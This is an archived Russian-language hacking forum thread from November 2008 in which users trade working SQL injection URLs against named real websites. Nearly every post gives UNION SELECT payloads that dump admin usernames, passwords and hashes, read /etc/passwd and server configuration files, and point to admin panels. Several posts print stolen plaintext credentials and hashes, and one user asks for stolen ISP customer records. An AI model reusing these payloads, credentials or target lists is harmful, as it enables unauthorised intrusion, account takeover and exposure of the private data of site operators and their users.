http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,column_name,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23+from+informat ion_schema.columns+where+table_name=0x646174696e67 5f636f756e747279--
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+and+1=0+union+select+1,2,3,4,column_name,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+ information_schema.columns+where+table_name=0x6461 74696e675f636f756e747279+limit+0,1--
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,concat_ws(0x3a3a3a,userna me,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23+from+dating_adminmembers--

information_schema.CHARACTER_SETS
information_schema.COLLATIONS
information_schema.VIEWS
information_schema.USER_PRIVILEGES
information_schema.TRIGGERS
information_schema.TABLE_PRIVILEGES
information_schema.TABLE_CONSTRAINTS
information_schema.TABLES
information_schema.STATISTICS
information_schema.SCHEMA_PRIVILEGES
information_schema.SCHEMATA
information_schema.ROUTINES
information_schema.KEY_COLUMN_USAGE
information_schema.COLUMN_PRIVILEGES
information_schema.COLUMNS
information_schema.COLLATION_CHARACTER_SET_APPLICA BILITY

datingfunda.dating_astrology
astro_id
astro_name
astro_desc
astro_start_date
astro_end_date

datingfunda.dating_blockmail
blockmail_id
blocker_id
blocked_id
doe

datingfunda.dating_country
country_id
country_name

datingfunda.dating_astro_comp
datingfunda.dating_album_photos
datingfunda.dating_album
datingfunda.dating_adminmembers
id
username
password
usertype
valid
lastlogin

http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,concat_ws(0x3a3a3a,userna me,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23+from+dating_adminmembers--
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,concat_ws(0x3a3a3a,userty pe,lastlogin),6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23+from+dating_adminmembers--
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,concat_ws(0x3a3a3a,lastlo gin),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23+from+dating_adminmembers--
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+and+1=0+union+select+1,2,3,4,new_email,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23+change_ email--

datingfunda.change_email
member_id
old_email
new_email
membercode
valid

http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+and+1=0+union+select+1,2,3,4,count(old_email), 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+ from+change_email--
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+and+1=0+union+select+1,2,3,4,count(new_email), 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+ from+change_email--
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+and+1=0+union+select+1,2,3,4,count(membercode) ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 +from+change_email--
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+and+1=0+union+select+1,2,3,4,count(valid),6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from +change_email--

Схватил скуль в давнишней теме, и решил ее дальше раскрутить и мыла стащить все 50к, но перехотелось :D.
А самый прикол что в Админке показывает что 50к мыл, а вот в базе тольок 72 мыла ))
Всю базу перерыл...

tromlen

04.11.2008, 00:30

to xPriZrAkx намекни где админка

spherics

04.11.2008, 02:15

Тут Официальный сайт группы "Ляпис Трубецкой" не было ?

http://www.lyapis.com/ photo.php? cl=18+union+select+1,2,3,4,concat(user(),0x3a,vers ion())--

Будет *)

Database Version: 5.0.67-community
Database name: lyapis_lyapis
User name: lyapis_lyapis@localhost

Таблицы:

access
adminhelp
administrator
adminlog
adminmessage
adminutil
announcement
announcementread
attachment
attachmentpermission
attachmenttype
attachmentviews
avatar
bbcode
calendar
calendarcustomfield
calendarmoderator
calendarpermission
cpsession
cron
cronlog
customavatar
customprofilepic
datastore
deletionlog
editlog
event
externalcache
faq
forum
forumpermission
forumread
holiday
icon
imagecategory
imagecategorypermission
infraction
infractionban
infractiongroup
infractionlevel
language
mailqueue
moderation
moderator
moderatorlog
passwordhistory
paymentapi
paymentinfo
paymenttransaction
phrase
phrasetype
plugin
pm
pmreceipt
pmtext
podcast
podcastitem
poll
pollvote
post
posthash
postindex
postparsed
product
productcode
productdependency
profilefield
profilefieldcategory
ranks
regimage
reminder
reputation
reputationlevel
rssfeed
rsslog
search
session
setting
settinggroup
sigparsed
sigpic
smilie
stats
strikes
style
subscribeevent
subscribeforum
subscribethread
subscription
subscriptionlog
subscriptionpermission
tachyforumpost
tachythreadpost
template
templatehistory
thread
threadrate
threadread
threadredirect
threadviews
upgradelog
user
useractivation
userban
userfield
usergroup
usergroupleader
usergrouprequest
userlist
usernote
userpromotion
usertextfield
usertitle
word
albums
anonses
articles
content
email
email2send
galleries
metatags
news
news_settings
newsletter
pictures
users_cp

Извиняюсь если что-то не так я новенький в этом.....

Cennarios

04.11.2008, 03:29

http://www.chattel.us/projects/details_content.php?p=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x3a3a,username,password),13+from+users+limit+0,1--
http://www.chattel.us/admin/

spherics

04.11.2008, 03:32

http://www.alivaria.by/ru/catalogue/8.html?template=20+un ion+select+1,2,version(),4,version()+limit+1,1--

5.0.51a-community-log
alivaria_cms@localhost
alivaria_cms

AkyHa_MaTaTa

04.11.2008, 15:11

to xPriZrAkx намекни где админка
http://www.datingfunda.com/webadmin/login.php

prescott

04.11.2008, 15:59

СтримТВ

http://tv.stream.ru/programs/channel/?ch_id=999999999999999+union+select+version(),2,co ncat_ws(0x3a3a,login,password)+from+user+limit+10, 1--%20&dws=2
Логинов почему то в таблице мало и в стандартную авторизацию они не проходят, следовательно либо таблица неактуальная, либо это логины манагеров

properm - достаточно крупный Пермский портал.

http://weather.properm.ru/-1+union+select+version(),version(),USER(),4+from+i nformation_schema.tables--%20.html

Snap

05.11.2008, 17:03

www.lancktelecom.ru

«ЛАНК Телеком» — один из ведущих операторов Санкт-Петербурга, обеспечивающий полный комплекс телекоммуникационных услуг для частных лиц и корпоративных пользователей:

http://www.lancktelecom.ru/news/actions/id20498989+union+select+1,concat(name,char(58),pas sword),3,4,5,6,7,8+from+users/*

http://www.lancktelecom.ru/admin/index.php
=))

dim_on

06.11.2008, 01:45

оффтопик можно?

Насколько опасно скулю без проксика делать? если я не собираюсь ломать, а попрактиковаться только хочу.

$n@ke

06.11.2008, 15:47

настолько,наскольо они смотрят за серваком...месяцок поживешь на изжоге, если не придут - повезло, придут - неповезло =))

http://www.shell-shocked.org/article.php?id=284'

Dbname: god_shellshocked
Version: 4.1.22-standard
Username: god_shellshocked@localhost
admin
news
user

---user:
ravi:1f7ea163765f995726dfc2674a54004c
cypress:b294bec518451f85dcca77d244cafaae
verbalshadow:cc5290657d39d0f877902895b9426101
rmaharaj:da5f05e5a77b8ddb8fb308eeab603575
sparkane:71ccd01324a8134cec8164137e6861fc

faza02

06.11.2008, 17:01

http://biz-registr.com.ua/?ct=-6+union+select+1,2,3,4,5,6,7,8,9/*
u_bizregistr@localhost

login: enter
passw: embrace
админка: _http://biz-registr.com.ua/admin/

spherics

06.11.2008, 22:31

http://www.lanck.ru/index.php?act=cat&div=100+union+select+1,concat( user(), 0x3a,version(),0x3a,database()),3,4,5,6,7,8/*

msklanck_mainsql@localhost:
4.0.23a-log:
db_msklanck_mainsql

Snap : Походу одни и теже делают сайты

spherics

06.11.2008, 22:45

В общем мега разработчики http://www.5d.ru/

Все их основные проекты в основном по одному сценарию в параметре ошибка

http://www.bladeserver.ru/?act=news&id=7+union+select+1,concat( user(),0x3a, version(),0x3a,database()),3,4,5,6,7,8,9/*

blade@zvm14.host.ru
4.0.27-log
blade

spherics

07.11.2008, 07:48

хренасе итаРРТАС -)

http://www.itartass.ur.ru/news/?id=40914+union+select+1,version(),3, 4,5,6,7,8,9,10,11,12,13/*

Версия 5.0.22-standard
Юзер itartass@localhost
Датабейс itartass

bons

07.11.2008, 11:23

www.mini-ats.ru, тИЦ=20

http://www.mini-ats.ru/ats.php?idc=-1%27+union+select+111,unhex(hex(concat(version(),' :',user(),':',database()))),333,444,555,666/*

version() - 5.0.18-debug-log
user() - mats@localhost
database() - mats

похоже там был форум IPB но ссылка на него с главной страницы ведет в никуда(404)
Зато все его таблицы есть в БД. Логины и соленые хэши юзеров(бывших) вытаскиваются такой длинной инъекцией:

http://www.mini-ats.ru/ats.php?idc=-1'+union+select+111,concat(converge_id,':',unhex(h ex(name)),':',unhex(hex(converge_pass_hash)),':',u nhex(hex(converge_pass_salt))),333,444,555,666+fro m+ipb_members_converge,ipb_members+where+converge_ id=id+limit+0,1/*

можно предположить что какой-то из этих пассов подойдет к админке c базовой авторизацией
www.mini-ats.ru/admin

-----------------------------------------------------

www.lnet.ru, тИЦ=110

http://www.lnet.ru/list.php?tid=-1+union+select+1,version(),3,4,5,user(),7,8,9,data base(),11,12,13,14,15,16,17,18,19,20--

version() - 5.0.22
database() - bvpru_textov
user() - bvpru_textov@localhost

здесь есть масса таблиц с порнотекстами, что не может не радовать, но есть и таблицы с чем-то напоминающим пароли:
autors
autors3
system_user

этими инъекциями можно просмотреть их содержимое

http://www.lnet.ru/list.php?tid=-1+union+select+1,concat(ID,char(0x3A),name,char(0x 3A),pass,char(0x3A),status),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20+from+autors+limit+0,1--
http://www.lnet.ru/list.php?tid=-1+union+select+1,concat(ID,char(0x3A),name,char(0x 3A),pass,char(0x3A),status),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20+from+autors3+limit+0,1--
http://www.lnet.ru/list.php?tid=-1+union+select+1,concat(id,char(0x3A),login,char(0 x3A),password,char(0x3A),name),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20+from+system_user+limit +0,1--

здесь есть формы для входа
http://www.lnet.ru/admin.php
http://www.lnet.ru/autor.php

-----------------------------------------------------

7vbf.info, тИЦ=10

http://7vbf.info/index.php?gl=catalog&cat=-1+union+select+concat(version(),char(0x3A),user(), char(0x3A),database())--

version() - 5.0.51a-15
user() - web22_u1@localhost
database() - web22_db1

в таблице moderator есть поля pass и cod.
может там еще какие таблицы есть интересные, но по их названиям так не скажешь

http://7vbf.info/index.php?gl=catalog&cat=-1+union+select+concat(login,char(0x3A),pass,char(0 x3A),cod)+from+moderator+limit+0,1--

-----------------------------------------------------

www.smaster.ru, тИЦ=80

http://www.smaster.ru/next/index.php?pid=-1+union+select+concat(version(),char(0x3A),user(), char(0x3A),database()),2,3,4,5/*

version() - 4.1.22-log
database() - smaster@localhost
user() - wwwsmasterru

FNS

08.11.2008, 00:02

Данные интернет карточек:
http://www.romb.net/topics/other/?id=-70+union+select+concat_ws(0x3a,CardID,SerialNo,Car dUserName,CardPasswd,SeriesID,Active,AccNo,Locatio nID,SellingDate,SellingAdmin,SellingIP,Discount,Fr eeBonus,Amount,Entered,SaleRecID)+from+ispbilling. TblPasswdCards+limit+1,1--
Админки не нашел...

spherics

08.11.2008, 05:44

Интернет магазин агенства Десси

http://www.dessy.ru/cgi-bin/shop.cgi?do=wholepage&id=-20/**/union/**/select/**/1, 2,3,version(),database(),6,user(),8,9,10, 11,12,13,14,15,16,17,18,19,20,21--

5.0.67-log
dessyru@10.10.10.220
dessyru

spherics

08.11.2008, 06:06

Интернет магазин 100 Пудов

http://www.zakaz.kr.ua/vitrina/tovar/?lev1=9&lev2=12&lev3=17&id=-170/**/union/**/select/**/1,2, 3,version(),user(), database(),7,8,9,10,11,12,13--

zakazkr_zakaz@localhost
5.0.45-log
zakazkr_zakaz

Nightmarе

08.11.2008, 06:15

Оффтоп:
Ребят, вижу тут пошли взломы провайдеров, убедительная просьба по возможности скидывайте данные о клиентах (телефон, номер договора, ФИО) мне в ЛС. Если вас конечно не затруднит.

spherics

08.11.2008, 06:18

Новостной портал.
Вроде бы всё прикрыто но опять же все данные смотрим внутри странички галлереи -)

http://kirovograd.rks.kr.ua/photo/gorod/monuments/photo00+ union+select+ database(),version(),user(),4--/

rkskru_rks@localhost
5.0.45-log-3
rkskru_rks

Cennarios

08.11.2008, 07:27

http://www.kulisa.eu/index.php?p=article&id=-1+union+select+1,2,login,password,5,6,7,8+from+use rs+limit+0,1

LOGIN:admin
PASS:i@srle

http://www.kulisa.eu/admin/

P.S. Очередной беспонтовый ресурс....

slider

08.11.2008, 10:44

http://dontime.dn.ua/index.php?new=99998009+union+select+1,2,3,4,concat (user_login,char(58),user_password),6,7,8,9,10,11, 12+from+users+limit+0,1/*

ThreeD

09.11.2008, 02:56

https://shop.invictusnetworks.com/detail.php?id=-16066+union+select+1,concat_ws(0x3A3a,version(),da tabase()),3,4,5,6,7,8,9,10,11,12/*

4.0.18::estore

Zinus

09.11.2008, 02:57

http://www.webhostinglogic.com/support/faq.php?cat=18+union+select+1,2,3+from+mysql.users/* - какой то хостинг буржуйский
http://ru-hosting.ru/article.php/?sid=999+union+select+1,2,user(),4,5,6/*

sabe

09.11.2008, 09:13

Lpl.arizona.edu - PR 7
Department of Planetary Sciences and Lunar Laboratory
http://www.lpl.arizona.edu/calendar/calendar.php?ID=136'+union+select+1,concat_ws(0x3a ,user(),database(),version()),3,4,5,6,7,8,9,10/*
5 ветка..
http://www.lpl.arizona.edu/calendar/calendar.php?ID=136'+union+select+1,concat_ws(0x3a ,table_name),3,4,5,6,7,8,9,10+from+information_sch ema.tables+limit+18,1/*
таблы..

в базе ниче такого не нашел )

(с) VITAL (http://vital.downloadportal.ru/index.php?newsid=15)

faza02

09.11.2008, 11:04

http://infosfera.sfo.ru/a/articles.php?cat_id=20&id=195+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12+LIM IT+1,1/*
user(): infosfera@localhost
database(): infosfera
version(): 4.0.24_Debian-10sarge1-log
type db: MSSQL

molotovkeyt

09.11.2008, 12:39

http://business.za.msn.com/msn/view_article.php?id=-1+union+select+1,version(),3,4,5,6,7--

5.1.17-beta :)

Calcutta

09.11.2008, 12:56

http://www.coffeetea.info/ee.php?page=topics&action=showcomments&id=717+AND+ascii(lower(substring(version(),1,1)))= 53--
version: 5.*
покопает кто дальше?

Zinus

09.11.2008, 15:12

http://lib.rin.ru/cgi-bin/new.pl?art=-1'+union+select+null,LOAD_FILE('/etc/passwd'),null/*

mailbrush

09.11.2008, 16:05

ThreeD

09.11.2008, 18:40

http://lib.rin.ru/cgi-bin/new.pl?art=-1'+union+select+null,LOAD_FILE('/etc/passwd'),null/*

Zinus
Вот ещё несколько

/etc/my.cnf
/etc/apache/conf/httpd.conf
/etc/group
/etc/logrotate.d/vsftpd.log

-m0rgan-

09.11.2008, 21:38

Вот скуля от меня:
http://wow.cybergame.su/index.php?newsid=-25+union+select+1,2,3,concat_ws(char(58),gmlevel,u sername,char(58),id,char(58),sha_pass_hash,char(58 ),sessionkey,char(58),v,char(58),s,char(58),email, char(58),joindate,char(58),last_ip,char(58),failed _logins,char(58),locked,char(58),last_login,char(5 8),online,char(58),tbc,char(58),mutetime,char(58), %20locale,char(58)),5,6+from+account--
P.S:там кста не плохая спам база будет)
---------------------------------
И вот еше одна:
http://www.cdirani.com/zcat.php?id=-1+union+select+1,2,3,concat_ws(0x3a,id,user,pass), 5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+admin/*
Админка:
http://www.cdirani.com/admin/login.php
Логин/пасс/ид:
admin:alisobhani:1
Вродь расшифровал,но они почему то не подходят(((

Тут канешно нету спам базы но все же...

ThreeD

09.11.2008, 22:57

http://www.theucard.com/merchant-details.php?id=-564+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, version(),16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 ,63,64,65,66,67,68--

5.0.51a-community

Бд,таблицы,колонки:

Дампите сами, пятая ж версия (очень много таблиц, сюда не влезут) :)

Проверяем юзеров на админа:
http://www.theucard.com/merchant-details.php?id=-564+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, group_concat(id,0x3a,username,0x3a,password,0x3a,a dmin,0x3a,email),16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 0,61,62,63,64,65,66,67,68+from+acl--

Все xD

http://www.theucard.com/master/db_backup.sql -
21метр.
Полезно, если надо будет получить таблицы\поля xcart (как памятка)).Можно посписывать (=

dir'Ы:

http://www.theucard.com/test/
http://www.theucard.com/master/
http://www.theucard.com/_borders
http://www.theucard.com/_vti_bin
http://www.theucard.com/banners
http://www.theucard.com/cpanel
http://www.theucard.com/documents
http://www.theucard.com/downloads
http://www.theucard.com/files
http://www.theucard.com/gallery
http://www.theucard.com/images
http://www.theucard.com/master
http://www.theucard.com/mobile
http://www.theucard.com/my
http://www.theucard.com/register
http://www.theucard.com/terminal
http://www.theucard.com/test
http://www.theucard.com/webmail
http://www.theucard.com/y

ThreeD

09.11.2008, 23:14

http://www.lgtmerchant.com/shop/checkout.php?id=1+AND+substring(version(),1,1)=4/*&goods=6

Шоп.Четвёрочка. Принтабельных нет.

FNS

09.11.2008, 23:46

http://koleso.topof.ru/testing_info.php?id=-7+union+select+1,2,3,4,concat_ws(0x3a,admin_login, admin_password),6,7,8+from+admins
news:044e7b0ce67db55376abda253f52e101:1b
tyre:c1d42f7311bfb28391292190c0a7a904:30
disk:10f43033d0b00ecccfc676bb6baa3f8e:64
auto:12794736bba2d6fc3b41e0b013d55178:1a
v.savosin:046a47fda9108dcc3cbd9d9ac0080ab6:84
hadmin:dea6235570ff43527546bfa39b1a7eeb:f6
Админка:
http://koleso.topof.ru/admin/login.php

MaDfUn

10.11.2008, 01:25

http://www.profilaktika.ru/index.php?id_mag=35&id_st=659&id_rub=-323+UNION+SELECT+1,concat(0x73716C696E6A666C64,AES _DECRYPT(AES_ENCRYPT(user,0x71),0x71)),3,4,5+FROM+ mysql.user/*
http://www.profilaktika.ru/index.php?id_mag=35&id_st=659&id_rub=-323+UNION+SELECT+1,concat(0x73716C696E6A666C64,AES _DECRYPT(AES_ENCRYPT(password,0x71),0x71)),3,4,5+F ROM+mysql.user/*

sqlinjfldodno-kashniki:sqlinjfld65204190655dbf01

FNS

10.11.2008, 01:48

http://www.4077th.ru/page.php?id=1453+and+1=0+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17--
Вывод через ошибку:
Database error: Invalid SQL: SELECT t.Txt,t.Location FROM SiteTexts AS t,Pages AS p WHERE (p.Path='5.0.67-log' OR p.Alias='5.0.67-log') AND t.Pid=p.Pid AND t.Type=1 AND t.ShowAll AND p.Pid=1453 and 1=0 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- AND FIND_IN_SET('0',t.Event)
От CMS с таблицы Users:
admin:$1$2$9pq26SwhZqNsS.fGgK2.01
С таблицы administrators:
SSASSASSA:a02c6e505941da1f811397735c2407f2:0a
От форума:
CCA:d88e256d7ba95c8e93ba258eba0a9db9

ThreeD

10.11.2008, 03:24

В продолжение темы

http://m.motivepath.com/jabberdemo/merchant-iphone.php?id=-181+union+select+1,version(),3,4,5,6,7/*

5.0.45-community

plutus

10.11.2008, 03:44

В продолжение темы

5.0.45-community

http://m.motivepath.com/jabberdemo/merchant-iphone.php?id=-181+union+select+1,concat_ws(0x03a,user,password), 3,4,5,6,7+from+mysql.user/*

Cennarios

10.11.2008, 04:57

http://realestates-bg.eu/sgrada.php?page=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a,us er,pass),10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,3,33,34,35,36,37,38,39,40 ,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 7,58+from+admin+limit+0,1

http://realestates-bg.eu/admin

=HALK=

10.11.2008, 07:07

http://talentvelocity.us/index.php?page_id=-1&news_id=-1+union+select+1,2,load_file(0x2f6574632f687474706 42f636f6e662f68747470642e636f6e66),4,5,6/*

http://www.sportsplex.us/news.php?newsID=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4/*

pingvincible

10.11.2008, 15:55

http://weather.properm.ru/-1+union+select+1,grantee,privilege_type,4+from+inf ormation_schema.user_privileges+limit+0,1.html

MaDfUn

10.11.2008, 21:29

http://www.oldarms.ru/litera.php?id=11&idg=-773+union+select+1,login,passwd,4,5,6,7,version(), database(),10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+ users/*
ss:ss

=HALK=

10.11.2008, 23:48

http://fmlive.us/news/index.php?newsid=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,tx t_username,txt_password,txt_email_address),11+from +totalwar.tbl_login+limit+1,1--

http://www.eibach.us/index_2.php?SPA=1&C_lang=en&LID1=13&LID2=0&LID3=0&LID4=0&LST=&NEWSID=-1+union+select+1,2,3,4,5,6,7,8,9,10,load_file('/etc/httpd/conf/httpd.conf')/*

http://www.rahulgandhi.us/php/showNews.php?newsid=1&linkid=-1+union+select+version()--

http://www.globalfriendship.us/newsdetail.php?news_id=-1+union+select+1,version(),3,4--

$n@ke

11.11.2008, 00:49

http://www.magalloy.net/detail.php?id=509+order+by+7/*
Dbname: magind_main
Version: 5.0.51a-community
User: magind@localhost

cardoso:pico007:admin
dalenorman:click2pub:admin
trichard:click2pub:admin

=HALK=

11.11.2008, 00:59

http://www.biosecure.us/index.php?content=news&news_id=-1'+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10/*
----------------------------------------------------

http://larry.matthouse.us/index.php?pageid=-1+union+select+1,version(),3--
----------------------------------------------------

http://citycarclub.us/page.php?id_page=-1+union+select+1,2,load_file(0x2f7661722f7777772f6 8746d6c2f6363635f66692f656e2f61646d696e2f696e636c7 564652f436f6e6669672f436f6e6669672e706870)/*

version:4.0.20-log
user:wwwadmin@localhost
database:ccc_en
-----------------------------------------------------

http://www.multiplesclerosisfoundation.net/online_newsDetails.php?ID=-1+union+select+1,2,load_file('/etc/passwd'),4,5,6/*

version:4.0.24-standard
user:root@localhost
database:msf_db
----------------------------------------------------

http://bowenshideout.limelyte.net/news.php?news_id=-1+union+select+1,2,3,4,unhex(hex(concat_ws(0x3a,us er_id,user_pass,user_email,user_url,user_level))), 6,7,8,9,10+from+nichebox.nb_users+limit+0,1/*

version:5.0.15
user:ann@localhost
database:nichebox

nichebox.nb_users
user_id
user_timestamp
user_sessions
user_lastsession
user_pass
user_email
user_fullname
user_showemail
user_url
user_level
user_latitude
user_longitude
user_bio

Админка
http://bowenshideout.limelyte.net/admin/
---------------------------------------------------------------

http://miheeff.net/news.php?news_id=-1+union+select+1,2,concat_ws(0x3a,username,rpasswo rd),4,5,6,7,8,9,10,11+from+affil.wd_g_users+limit+ 0,1--

version:5.0.51b-community-nt
user:admin@localhost
database:miheeff_net

Блог admin:admin
Админка:
http://miheeff.net/admin/

tbody

11.11.2008, 03:23

слепая
http://www.simbin.se/news.php?newsid=108+union+select+1,2,3,4,5+from+us ers--

http://www.shootingstarsfootballclub.com/gallery.php?catID=1+and+0+union+select+1,2,version (),4,5--

=HALK=

11.11.2008, 05:00

http://www.jackrussellmusic.net/news.php?news_id=-1+union+select+1,concat_ws(0xb,version(),user(),da tabase()),3,4,5,6,7,8,9,10,11,12/*

version:5.0.45-log
user:dbo210992846@212.227.119.171
database:db210992846

Админка
http://www.jackrussellmusic.net/phpmyadmin/
----------------------------------------------------------------------

http://www.crivello.net/news_detail.php?news_id=-1+union+select+1,concat_ws(0xb,username,password), 3,4,5,6,7,8,9,10+from+marinegr_mgv.tbladmin--

version:5.0.51a-3ubuntu5.1
user:crivbus@localhost
database:crivbus_crivello

Admin ishir:ishir123
-------------------------------------------------------------

http://thebigone.homeip.net/comments/comment_news.php?news_id=-1+union+select+1,load_file('/etc/passwd'),3,4,5,6/*
-----------------------------------------------------------------

http://www.inspiredadventures.com.au/news.php?news_id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),user(),database()),8,9--

version:5.0.51b-log
user:ins@localhost
database:insInspired

Есть таблицы от phpmyadmin
-----------------------------------------------------------------

http://www.nrn.org.au/local_update.php?news_id=9999+union+select+1,unhex (hex(concat_ws(0xb,admin_email,admin_password))),3 ,4,5,6+from+tbl_admin_user+limit+0,1--

Админ
samirman@hotmail.com:593f2e62bf3cb5b255dc15b842c84 ff0!e5
samirman@hotmail.com:7dbf82d961104983d41a20cf3c146 250!94
я только не вьехал чё за хэш....толи солёный мд5, толи ещё что...

Админка: http://www.nrn.org.au/admin/
----------------------------------------------------------------

http://www.lakewoodshores.com.au/index.php?option=previous&news_id=-1+union+select+1,2,3,Concat_ws(0xb,version(),user( ),database()),5/*

version:5.0.27-log
user:lakewood@localhost
database:lakewood_db

Админка: http://www.lakewoodshores.com.au/admin/
-----------------------------------------------------------------------

http://www.animaldoctors.com.au/index.php?pgid=7&news_id=-1+union+select+1,2,concat_ws(0xb,version(),user(), database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20--

version:5.0.51a-community
user:animaldo_bbuser@localhost
database:animaldo_bbdb

Юзвери(может и админы)
admin@exateam.com:.exa11.:
bbadmin:bbadmin01:wpsupport@bendigobank.com.au
admin101:animal:drsteve@animaldoctors.com.au

tsesar

11.11.2008, 08:50

универмаг
http://www.tsum.kirov.ru/img/?id=-1+union+select+1,2,img+from+images+where+id=343

user:
tsum@localhost

admin:
https://www.tsum.kirov.ru:10000/ //webmin

information_schema:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
author
content
games
images
konkurs_konkurs
konkurs_otvet
konkurs_peoples
konkurs_vopros
link_org
link_words
links
miss
news
orders
orgs
price
properties
stat
temp
vote_quest
vote_theme
za_ro_points
za_ro_points1
za_ro_points2
za_ro_points3
za_ro_points_all
za_ro_points_all_2006
za_ro_points_old
za_ro_points_t
za_rodinu
counsel
forums
messages
sendmail
sessions
themes
users

pingvincible

11.11.2008, 10:44

Вот админка: http://www.tsum.kirov.ru/admin

http://www.tsum.kirov.ru/img/?big=2&id=-1+union+select+1,concat(login,0x3a,password),3+fro m+tsum_forum.users+limit+0,1+--+

Юзеры форума:

a:a
Администрация:123
Редактор:Редактор

и т.д. по лимиту

cremator (c)

11.11.2008, 10:53

На сайте http://www.akords.net/ когда заходишь в текст или аккорды выдает пхп синтакс эрор. Не знаю как раскрутить скулю.. Попробуйте кто умеет:)

$n@ke

11.11.2008, 14:58

Для любителей пошпилить:
http://gamers.eurogamer.net/giveaways.php?id=-86925+union+select+1,user,password,4,5,6,7,8,9,10, 11+from+mysql.user+limit+1,100/*

еще интересности:
admin.eurogamer.net
sales.eurogamer.net

некоторые пассы расшифровались,кто найдет пхпмайадмин, стучите)

egadmin:e3f23b5312895735ce7185242cb10e009a82b41c:s j492fgn
saleswww:4d1deaaafd4843c61c2259f72c9a3f484f05ef35: p7y1g7ay
jobsadmin:15af7fb57fc683b97b89b4adfe635454bb4d52a6 :j46j1nnk
lgcfwww:a8139381aec349bd452bb085557e7a3ea9cc33c2:k 8h0s74x
egcmswww:fd9c7815cc8e1a9da37e15ca74fa7e6baaaf9490: pltmk3ca
egcmsadmin:e3f23b5312895735ce7185242cb10e009a82b41 c:sj492fgn

=HALK=

11.11.2008, 15:35

http://www.damagame.com/player.php?_id=-1+union+select+1,concat_ws(0x3a,_id,login,pass,ema il),3,4,5,6,7,8,9,10,11,12+from+damagame_damagame. players+where+login=0x61646d696e--
admin:sassouki

=HALK=

11.11.2008, 15:48

http://bbc-polska.com/index.php?t=of&_id=-1+union+select+1,2,3,4,concat_ws(0x3a,username,pas sword),6,7,8+from+bbc.user/*

Админка : http://bbc-polska.com/admin admin:bbc

truelamer

11.11.2008, 18:03

5 ветка

http://arsenal-electro.ru/news_page.php?id=-1+union+select+1,2,concat(email,char(58),password) ,4+from+user+limit+1,1/*

FNS

11.11.2008, 20:22

На сайте http://www.akords.net/ когда заходишь в текст или аккорды выдает пхп синтакс эрор. Не знаю как раскрутить скулю.. Попробуйте кто умеет:)
http://www.akords.net/ru/song/-32702+union+select+1,2,3,4,5,version(),7,8,9,10,11 ,12,13,14,15,16,17,18,19,20--/
5.0.41-log
Дальше сам, там пятая ветка :)

-m0rgan-

11.11.2008, 23:52

http://www.eajc.org/analytics_show_r.php?id=-27+union+select+1,2,3,4,5,concat_ws(0x3a,user_id,n ame,pass),7,8,9+from+adbm_user--
логин,пасс:
admin:1d1ac3f687c1572b5654e3fbd502a7c9
---------------------------------------
http://www.operationsports.com/pressview.php?id=-52+union+select+1,concat_ws(0x3a,username,password ),3,4,5,6,7,8,9,10,11,12,13+from+user
логин,пасс:
Administrator:ad31bcf7706b6b6ec87ab0229346cd
--------------------------------------
http://scarsdalecoops.com/index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0x3a,concat(usernam e,0x3a,password),1,1,1,1,1,1,2,2,2,2,2/**/from/*%20*/admin/*where,limit,2--
